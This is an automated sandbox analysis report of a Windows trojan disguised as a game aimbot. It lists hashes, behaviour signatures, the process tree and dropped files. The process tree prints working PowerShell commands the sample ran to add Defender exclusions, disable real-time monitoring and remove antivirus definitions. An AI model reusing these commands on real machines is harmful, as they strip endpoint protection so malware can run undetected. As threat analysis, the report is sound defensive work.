Resubmissions

02-10-2024 16:11

241002-tm6nssvgnp 10

02-10-2024 16:08

241002-tlgnaayeqa 10

Analysis

  • max time kernel
    300s
  • max time network
    207s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 16:11

General

  • Target

    NEWAIMBOT-_PERSONALIZADO.exe

  • Size

    15.2MB

  • MD5

    4ac16c841f3503982341a021726a6ff7

  • SHA1

    b32ad8f8e0883c7f786049c03e935d2770c47ec0

  • SHA256

    f15e686d612fdab8efd24397caf2423064a9ede0a442065c8806389fe593e0cf

  • SHA512

    2242ab4a3c7537a35b051fe216b5ccdf3d262899218e601aa55157ff20cfb23cc4f1637f477b1b94bc4796773fcfb661f9fc1d18aa01ca3bb53b62f266810065

  • SSDEEP

    393216:/YSvqCWIqDkgn0HZY9N9Cti2nfOshouIkPftRL54YRJb:/YSyCWVkNaRCE22wouTtRLzb

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 35 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe
    "C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe
      "C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3724
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Writes to the Master Boot Record (MBR)
          • Drops file in System32 directory
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Panel de prueba activado | anel de prueba activado', 0, 'Nova Blaze', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Panel de prueba activado | anel de prueba activado', 0, 'Nova Blaze', 48+16);close()"
          4⤵
            PID:3116
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2388
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3264
      • C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe
        "C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe
          "C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe"
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1076
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NEWAIMBOT-_PERSONALIZADO.exe'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:4184
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:452
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:3080
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Panel de prueba activado | anel de prueba activado', 0, 'Nova Blaze', 48+16);close()""
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1136
            • C:\Windows\system32\mshta.exe
              mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Panel de prueba activado | anel de prueba activado', 0, 'Nova Blaze', 48+16);close()"
              4⤵
                PID:3360
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4468
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4200
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3608
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3992
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5052

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          cadef9abd087803c630df65264a6c81c

          SHA1

          babbf3636c347c8727c35f3eef2ee643dbcc4bd2

          SHA256

          cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

          SHA512

          7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\VCRUNTIME140.dll

          Filesize

          106KB

          MD5

          49c96cecda5c6c660a107d378fdfc3d4

          SHA1

          00149b7a66723e3f0310f139489fe172f818ca8e

          SHA256

          69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

          SHA512

          e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_bz2.pyd

          Filesize

          48KB

          MD5

          c413931b63def8c71374d7826fbf3ab4

          SHA1

          8b93087be080734db3399dc415cc5c875de857e2

          SHA256

          17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

          SHA512

          7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_ctypes.pyd

          Filesize

          58KB

          MD5

          00f75daaa7f8a897f2a330e00fad78ac

          SHA1

          44aec43e5f8f1282989b14c4e3bd238c45d6e334

          SHA256

          9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

          SHA512

          f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_decimal.pyd

          Filesize

          106KB

          MD5

          e3fb8bf23d857b1eb860923ccc47baa5

          SHA1

          46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

          SHA256

          7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

          SHA512

          7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_hashlib.pyd

          Filesize

          35KB

          MD5

          b227bf5d9fec25e2b36d416ccd943ca3

          SHA1

          4fae06f24a1b61e6594747ec934cbf06e7ec3773

          SHA256

          d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

          SHA512

          c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_lzma.pyd

          Filesize

          85KB

          MD5

          542eab18252d569c8abef7c58d303547

          SHA1

          05eff580466553f4687ae43acba8db3757c08151

          SHA256

          d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

          SHA512

          b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_queue.pyd

          Filesize

          25KB

          MD5

          347d6a8c2d48003301032546c140c145

          SHA1

          1a3eb60ad4f3da882a3fd1e4248662f21bd34193

          SHA256

          e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

          SHA512

          b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_socket.pyd

          Filesize

          43KB

          MD5

          1a34253aa7c77f9534561dc66ac5cf49

          SHA1

          fcd5e952f8038a16da6c3092183188d997e32fb9

          SHA256

          dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

          SHA512

          ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_sqlite3.pyd

          Filesize

          56KB

          MD5

          1a8fdc36f7138edcc84ee506c5ec9b92

          SHA1

          e5e2da357fe50a0927300e05c26a75267429db28

          SHA256

          8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

          SHA512

          462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\_ssl.pyd

          Filesize

          65KB

          MD5

          f9cc7385b4617df1ddf030f594f37323

          SHA1

          ebceec12e43bee669f586919a928a1fd93e23a97

          SHA256

          b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

          SHA512

          3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\base_library.zip

          Filesize

          1.4MB

          MD5

          32ede00817b1d74ce945dcd1e8505ad0

          SHA1

          51b5390db339feeed89bffca925896aff49c63fb

          SHA256

          4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

          SHA512

          a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\blank.aes

          Filesize

          124KB

          MD5

          c3c7f990121bdf5cae9113dffdb0d626

          SHA1

          8ba748f96f2961878089c26627640baa9d1de7ed

          SHA256

          9b88123ab3020a28c3d4c928356c88f73a9e9d02a555bc1660abbe6a71a224da

          SHA512

          0da3c6c238864824c273c495c873e25a64d30a321314b181b406fad534b4a509acb9b142f87523307c3e9b9d1cf9d54981dc5caf1af7f2d22a77f5ed3a66edd9

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\blank.aes

          Filesize

          124KB

          MD5

          ac2354852286d30c701092d8ee392177

          SHA1

          ad6ea38dcedc513dacc0ddcad270278a0f269128

          SHA256

          6535b727ed65f5bfea3fa0a126df4e6bc787c329eb34ed7a4e1713120b044671

          SHA512

          d04896a76d648c00355429ed6dc3fc38841b8372179f5666eeaa3f35eb7528defe89a5ce558d10be1b4c2adb3ac42bf8930c72f4fddc6f56f09f3dcd63b1779e

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\bound.blank

          Filesize

          7.9MB

          MD5

          1b54a947fe3b868be4a67a89b1be6695

          SHA1

          fd1736e8d3571d20161c3e0b450ada4daf6997e7

          SHA256

          745f59b236f7d0fbf50d29cc47d574cbf0518829e6bc45d862431d94d9ec9544

          SHA512

          9ed90dd22897e5f640ea06704d604b428a6a96308e39c5e49fa3b66c904bf392d06623af32c688510abc1b87297f934615b1b1dfe6ed3af41a4ec9e4aad916b3

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\libcrypto-3.dll

          Filesize

          1.6MB

          MD5

          78ebd9cb6709d939e4e0f2a6bbb80da9

          SHA1

          ea5d7307e781bc1fa0a2d098472e6ea639d87b73

          SHA256

          6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

          SHA512

          b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\libffi-8.dll

          Filesize

          29KB

          MD5

          08b000c3d990bc018fcb91a1e175e06e

          SHA1

          bd0ce09bb3414d11c91316113c2becfff0862d0d

          SHA256

          135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

          SHA512

          8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\libssl-3.dll

          Filesize

          223KB

          MD5

          bf4a722ae2eae985bacc9d2117d90a6f

          SHA1

          3e29de32176d695d49c6b227ffd19b54abb521ef

          SHA256

          827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

          SHA512

          dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\python311.dll

          Filesize

          1.6MB

          MD5

          5f6fd64ec2d7d73ae49c34dd12cedb23

          SHA1

          c6e0385a868f3153a6e8879527749db52dce4125

          SHA256

          ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

          SHA512

          c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\rar.exe

          Filesize

          615KB

          MD5

          9c223575ae5b9544bc3d69ac6364f75e

          SHA1

          8a1cb5ee02c742e937febc57609ac312247ba386

          SHA256

          90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

          SHA512

          57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\rarreg.key

          Filesize

          456B

          MD5

          4531984cad7dacf24c086830068c4abe

          SHA1

          fa7c8c46677af01a83cf652ef30ba39b2aae14c3

          SHA256

          58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

          SHA512

          00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\select.pyd

          Filesize

          25KB

          MD5

          45d5a749e3cd3c2de26a855b582373f6

          SHA1

          90bb8ac4495f239c07ec2090b935628a320b31fc

          SHA256

          2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

          SHA512

          c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\sqlite3.dll

          Filesize

          622KB

          MD5

          dbc64142944210671cca9d449dab62e6

          SHA1

          a2a2098b04b1205ba221244be43b88d90688334c

          SHA256

          6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

          SHA512

          3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

        • C:\Users\Admin\AppData\Local\Temp\_MEI13442\unicodedata.pyd

          Filesize

          295KB

          MD5

          8c42fcc013a1820f82667188e77be22d

          SHA1

          fba7e4e0f86619aaf2868cedd72149e56a5a87d4

          SHA256

          0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

          SHA512

          3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wajjq2mw.z4p.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\bound.exe

          Filesize

          7.9MB

          MD5

          ee688a204a33f98d37486edccadcf4c1

          SHA1

          3eb7eb0e2c67ac935ec592f1715c536bbe761d02

          SHA256

          7d6d0513ead748462827fb6c25d28144f244909e599fb3dc137c87804d25fe08

          SHA512

          9c4bb14cf5073d70aaa032f13c898c35240d68cd5ee41175530e506ea4fcc29de68bc6b0de52f04fe1cf9a2a6c1556b781743fd707c9a4429d20d7894e659a01

        • memory/392-150-0x00007FFF4ADB0000-0x00007FFF4ADB2000-memory.dmp

          Filesize

          8KB

        • memory/392-151-0x00007FF657540000-0x00007FF658696000-memory.dmp

          Filesize

          17.3MB

        • memory/392-163-0x00007FF657540000-0x00007FF658696000-memory.dmp

          Filesize

          17.3MB

        • memory/392-149-0x00007FF657540000-0x00007FF658696000-memory.dmp

          Filesize

          17.3MB

        • memory/392-123-0x00007FF657540000-0x00007FF658696000-memory.dmp

          Filesize

          17.3MB

        • memory/392-119-0x00007FF657540000-0x00007FF658696000-memory.dmp

          Filesize

          17.3MB

        • memory/464-264-0x00007FFF37AD0000-0x00007FFF37AFD000-memory.dmp

          Filesize

          180KB

        • memory/464-222-0x00007FFF38840000-0x00007FFF38863000-memory.dmp

          Filesize

          140KB

        • memory/464-265-0x00007FFF2DB40000-0x00007FFF2DB63000-memory.dmp

          Filesize

          140KB

        • memory/464-266-0x00007FFF3B3C0000-0x00007FFF3B3D9000-memory.dmp

          Filesize

          100KB

        • memory/464-252-0x00007FFF2AB30000-0x00007FFF2ACA7000-memory.dmp

          Filesize

          1.5MB

        • memory/464-225-0x00007FFF3C2A0000-0x00007FFF3C2AD000-memory.dmp

          Filesize

          52KB

        • memory/464-226-0x00007FFF2A3C0000-0x00007FFF2A4DC000-memory.dmp

          Filesize

          1.1MB

        • memory/464-224-0x00007FFF2A4E0000-0x00007FFF2A4F4000-memory.dmp

          Filesize

          80KB

        • memory/464-263-0x00007FFF40E40000-0x00007FFF40E4F000-memory.dmp

          Filesize

          60KB

        • memory/464-223-0x00007FFF40E40000-0x00007FFF40E4F000-memory.dmp

          Filesize

          60KB

        • memory/464-262-0x00007FFF38840000-0x00007FFF38863000-memory.dmp

          Filesize

          140KB

        • memory/464-218-0x00007FFF2B870000-0x00007FFF2BE59000-memory.dmp

          Filesize

          5.9MB

        • memory/464-261-0x00007FFF2A500000-0x00007FFF2AA20000-memory.dmp

          Filesize

          5.1MB

        • memory/464-259-0x00007FFF3C2A0000-0x00007FFF3C2AD000-memory.dmp

          Filesize

          52KB

        • memory/464-258-0x00007FFF2A4E0000-0x00007FFF2A4F4000-memory.dmp

          Filesize

          80KB

        • memory/464-256-0x00007FFF2AA20000-0x00007FFF2AAED000-memory.dmp

          Filesize

          820KB

        • memory/464-221-0x00007FFF2A500000-0x00007FFF2AA20000-memory.dmp

          Filesize

          5.1MB

        • memory/464-260-0x00007FFF2A3C0000-0x00007FFF2A4DC000-memory.dmp

          Filesize

          1.1MB

        • memory/464-219-0x00007FFF2AA20000-0x00007FFF2AAED000-memory.dmp

          Filesize

          820KB

        • memory/464-220-0x0000027AA8AD0000-0x0000027AA8FF0000-memory.dmp

          Filesize

          5.1MB

        • memory/464-217-0x00007FFF2AAF0000-0x00007FFF2AB23000-memory.dmp

          Filesize

          204KB

        • memory/464-216-0x00007FFF3F2A0000-0x00007FFF3F2AD000-memory.dmp

          Filesize

          52KB

        • memory/464-215-0x00007FFF33100000-0x00007FFF33119000-memory.dmp

          Filesize

          100KB

        • memory/464-254-0x00007FFF3F2A0000-0x00007FFF3F2AD000-memory.dmp

          Filesize

          52KB

        • memory/464-214-0x00007FFF2AB30000-0x00007FFF2ACA7000-memory.dmp

          Filesize

          1.5MB

        • memory/464-255-0x00007FFF2AAF0000-0x00007FFF2AB23000-memory.dmp

          Filesize

          204KB

        • memory/464-212-0x00007FFF3B3C0000-0x00007FFF3B3D9000-memory.dmp

          Filesize

          100KB

        • memory/464-213-0x00007FFF2DB40000-0x00007FFF2DB63000-memory.dmp

          Filesize

          140KB

        • memory/464-211-0x00007FFF37AD0000-0x00007FFF37AFD000-memory.dmp

          Filesize

          180KB

        • memory/464-197-0x00007FFF40E40000-0x00007FFF40E4F000-memory.dmp

          Filesize

          60KB

        • memory/464-194-0x00007FFF38840000-0x00007FFF38863000-memory.dmp

          Filesize

          140KB

        • memory/464-190-0x00007FFF2B870000-0x00007FFF2BE59000-memory.dmp

          Filesize

          5.9MB

        • memory/464-253-0x00007FFF33100000-0x00007FFF33119000-memory.dmp

          Filesize

          100KB

        • memory/464-246-0x00007FFF2B870000-0x00007FFF2BE59000-memory.dmp

          Filesize

          5.9MB

        • memory/3724-62-0x00007FFF3B850000-0x00007FFF3B9C7000-memory.dmp

          Filesize

          1.5MB

        • memory/3724-72-0x00007FFF2D020000-0x00007FFF2D609000-memory.dmp

          Filesize

          5.9MB

        • memory/3724-144-0x00007FFF3F2C0000-0x00007FFF3F2CD000-memory.dmp

          Filesize

          52KB

        • memory/3724-145-0x00007FFF3B660000-0x00007FFF3B77C000-memory.dmp

          Filesize

          1.1MB

        • memory/3724-131-0x00007FFF2D020000-0x00007FFF2D609000-memory.dmp

          Filesize

          5.9MB

        • memory/3724-133-0x00007FFF456A0000-0x00007FFF456AF000-memory.dmp

          Filesize

          60KB

        • memory/3724-134-0x00007FFF3F1D0000-0x00007FFF3F1FD000-memory.dmp

          Filesize

          180KB

        • memory/3724-135-0x00007FFF43E00000-0x00007FFF43E19000-memory.dmp

          Filesize

          100KB

        • memory/3724-136-0x00007FFF3C310000-0x00007FFF3C333000-memory.dmp

          Filesize

          140KB

        • memory/3724-137-0x00007FFF3B850000-0x00007FFF3B9C7000-memory.dmp

          Filesize

          1.5MB

        • memory/3724-138-0x00007FFF416C0000-0x00007FFF416D9000-memory.dmp

          Filesize

          100KB

        • memory/3724-139-0x00007FFF40E40000-0x00007FFF40E4D000-memory.dmp

          Filesize

          52KB

